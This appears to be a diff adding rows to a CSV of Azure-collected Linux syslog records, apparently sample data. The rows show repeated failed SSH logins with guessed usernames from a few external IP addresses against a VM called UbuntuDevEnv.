+12727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:00,UbuntuDevEnv,2019-06-26 03:52:00,auth,UbuntuDevEnv,info,Failed password for invalid user sklopaket from 106.13.4.172 port 37100 ssh2,118982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sklopaket,106.13.4.1,37100,,
+12728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:01,UbuntuDevEnv,2019-06-26 03:52:00,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 37100:11: Bye Bye [preauth],118982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,37100,,
+12729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:01,UbuntuDevEnv,2019-06-26 03:52:00,auth,UbuntuDevEnv,info,Disconnected from invalid user sklopaket 106.13.4.172 port 37100 [preauth],118982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sklopaket,106.13.4.1,37100,,
+12730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:01,UbuntuDevEnv,2019-06-26 03:52:01,auth,UbuntuDevEnv,info,Invalid user sftptest from 118.24.131.236 port 54840,118994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sftptest,118.24.131.2,54840,,
+12731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:01,UbuntuDevEnv,2019-06-26 03:52:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,118994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:01,UbuntuDevEnv,2019-06-26 03:52:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:03,UbuntuDevEnv,2019-06-26 03:52:03,auth,UbuntuDevEnv,info,Failed password for invalid user sftptest from 118.24.131.236 port 54840 ssh2,118994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sftptest,118.24.131.2,54840,,
+12734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:04,UbuntuDevEnv,2019-06-26 03:52:03,auth,UbuntuDevEnv,info,Disconnected from invalid user sftptest 118.24.131.236 port 54840 [preauth],118994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sftptest,118.24.131.2,54840,,
+12735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:04,UbuntuDevEnv,2019-06-26 03:52:03,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 54840:11: Bye Bye [preauth],118994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,54840,,
+12736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:38,UbuntuDevEnv,2019-06-26 03:52:37,auth,UbuntuDevEnv,info,Invalid user bi from 106.13.4.172 port 41968,119122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bi,106.13.4.1,41968,,
+12737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:38,UbuntuDevEnv,2019-06-26 03:52:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:38,UbuntuDevEnv,2019-06-26 03:52:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,119122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:40,UbuntuDevEnv,2019-06-26 03:52:40,auth,UbuntuDevEnv,info,Failed password for invalid user bi from 106.13.4.172 port 41968 ssh2,119122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bi,106.13.4.1,41968,,
+12740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:40,UbuntuDevEnv,2019-06-26 03:52:40,auth,UbuntuDevEnv,info,Disconnected from invalid user bi 106.13.4.172 port 41968 [preauth],119122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bi,106.13.4.1,41968,,
+12741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:52:40,UbuntuDevEnv,2019-06-26 03:52:40,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 41968:11: Bye Bye [preauth],119122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,41968,,
+12742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:15,UbuntuDevEnv,2019-06-26 03:53:15,auth,UbuntuDevEnv,info,Invalid user ubuntu from 106.13.4.172 port 46832,119264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,106.13.4.1,46832,,
+12743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:15,UbuntuDevEnv,2019-06-26 03:53:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:15,UbuntuDevEnv,2019-06-26 03:53:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,119264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:18,UbuntuDevEnv,2019-06-26 03:53:17,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 106.13.4.172 port 46832 ssh2,119264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,106.13.4.1,46832,,
+12746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:18,UbuntuDevEnv,2019-06-26 03:53:17,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 46832:11: Bye Bye [preauth],119264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,46832,,
+12747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:18,UbuntuDevEnv,2019-06-26 03:53:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 106.13.4.172 port 46832 [preauth],119264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,106.13.4.1,46832,,
+12748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:30,UbuntuDevEnv,2019-06-26 03:53:29,auth,UbuntuDevEnv,info,Invalid user zhei from 118.24.131.236 port 39300,119311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhei,118.24.131.2,39300,,
+12749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:30,UbuntuDevEnv,2019-06-26 03:53:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:30,UbuntuDevEnv,2019-06-26 03:53:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,119311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:32,UbuntuDevEnv,2019-06-26 03:53:31,auth,UbuntuDevEnv,info,Failed password for invalid user zhei from 118.24.131.236 port 39300 ssh2,119311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhei,118.24.131.2,39300,,
+12752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:32,UbuntuDevEnv,2019-06-26 03:53:32,auth,UbuntuDevEnv,info,Disconnected from invalid user zhei 118.24.131.236 port 39300 [preauth],119311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhei,118.24.131.2,39300,,
+12753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:32,UbuntuDevEnv,2019-06-26 03:53:32,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 39300:11: Bye Bye [preauth],119311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,39300,,
+12754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:53,UbuntuDevEnv,2019-06-26 03:53:53,auth,UbuntuDevEnv,info,Invalid user liviu from 106.13.4.172 port 51696,119392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liviu,106.13.4.1,51696,,
+12755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:53,UbuntuDevEnv,2019-06-26 03:53:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,119392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:53,UbuntuDevEnv,2019-06-26 03:53:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:55,UbuntuDevEnv,2019-06-26 03:53:55,auth,UbuntuDevEnv,info,Failed password for invalid user liviu from 106.13.4.172 port 51696 ssh2,119392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liviu,106.13.4.1,51696,,
+12758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:55,UbuntuDevEnv,2019-06-26 03:53:55,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 51696:11: Bye Bye [preauth],119392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,51696,,
+12759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:53:55,UbuntuDevEnv,2019-06-26 03:53:55,auth,UbuntuDevEnv,info,Disconnected from invalid user liviu 106.13.4.172 port 51696 [preauth],119392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liviu,106.13.4.1,51696,,
+12760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:30,UbuntuDevEnv,2019-06-26 03:54:30,auth,UbuntuDevEnv,info,Invalid user anita from 106.13.4.172 port 56560,119527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anita,106.13.4.1,56560,,
+12761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:30,UbuntuDevEnv,2019-06-26 03:54:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:30,UbuntuDevEnv,2019-06-26 03:54:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,119527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:32,UbuntuDevEnv,2019-06-26 03:54:31,auth,UbuntuDevEnv,info,Failed password for invalid user anita from 106.13.4.172 port 56560 ssh2,119527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anita,106.13.4.1,56560,,
+12764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:32,UbuntuDevEnv,2019-06-26 03:54:32,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 56560:11: Bye Bye [preauth],119527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,56560,,
+12765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:32,UbuntuDevEnv,2019-06-26 03:54:32,auth,UbuntuDevEnv,info,Disconnected from invalid user anita 106.13.4.172 port 56560 [preauth],119527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anita,106.13.4.1,56560,,
+12766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:56,UbuntuDevEnv,2019-06-26 03:54:55,auth,UbuntuDevEnv,info,Invalid user ntpupdate from 118.24.131.236 port 51990,119616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ntpupdate,118.24.131.2,51990,,
+12767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:56,UbuntuDevEnv,2019-06-26 03:54:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:56,UbuntuDevEnv,2019-06-26 03:54:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,119616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:58,UbuntuDevEnv,2019-06-26 03:54:57,auth,UbuntuDevEnv,info,Failed password for invalid user ntpupdate from 118.24.131.236 port 51990 ssh2,119616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ntpupdate,118.24.131.2,51990,,
+12770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:58,UbuntuDevEnv,2019-06-26 03:54:57,auth,UbuntuDevEnv,info,Disconnected from invalid user ntpupdate 118.24.131.236 port 51990 [preauth],119616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ntpupdate,118.24.131.2,51990,,
+12771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:54:58,UbuntuDevEnv,2019-06-26 03:54:57,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 51990:11: Bye Bye [preauth],119616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,51990,,
+12772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:08,UbuntuDevEnv,2019-06-26 03:55:08,auth,UbuntuDevEnv,info,Invalid user sw from 106.13.4.172 port 33194,119668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sw,106.13.4.1,33194,,
+12773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:08,UbuntuDevEnv,2019-06-26 03:55:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:08,UbuntuDevEnv,2019-06-26 03:55:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,119668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:10,UbuntuDevEnv,2019-06-26 03:55:10,auth,UbuntuDevEnv,info,Failed password for invalid user sw from 106.13.4.172 port 33194 ssh2,119668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sw,106.13.4.1,33194,,
+12776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:11,UbuntuDevEnv,2019-06-26 03:55:10,auth,UbuntuDevEnv,info,Disconnected from invalid user sw 106.13.4.172 port 33194 [preauth],119668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sw,106.13.4.1,33194,,
+12777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:11,UbuntuDevEnv,2019-06-26 03:55:10,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 33194:11: Bye Bye [preauth],119668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,33194,,
+12778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:21,UbuntuDevEnv,2019-06-26 03:55:20,auth,UbuntuDevEnv,info,Invalid user terre from 45.55.190.46 port 33278,119606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,terre,45.55.190.4,33278,,
+12779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:21,UbuntuDevEnv,2019-06-26 03:55:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:21,UbuntuDevEnv,2019-06-26 03:55:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,119606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+12781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:23,UbuntuDevEnv,2019-06-26 03:55:22,auth,UbuntuDevEnv,info,Failed password for invalid user terre from 45.55.190.46 port 33278 ssh2,119606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,terre,45.55.190.4,33278,,
+12782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:23,UbuntuDevEnv,2019-06-26 03:55:22,auth,UbuntuDevEnv,info,Disconnected from invalid user terre 45.55.190.46 port 33278 [preauth],119606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,terre,45.55.190.4,33278,,
+12783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:23,UbuntuDevEnv,2019-06-26 03:55:22,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 33278:11: Bye Bye [preauth],119606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,33278,,
+12784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:45,UbuntuDevEnv,2019-06-26 03:55:45,auth,UbuntuDevEnv,info,Invalid user ik from 106.13.4.172 port 38064,119802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ik,106.13.4.1,38064,,
+12785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:45,UbuntuDevEnv,2019-06-26 03:55:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,119802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:45,UbuntuDevEnv,2019-06-26 03:55:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
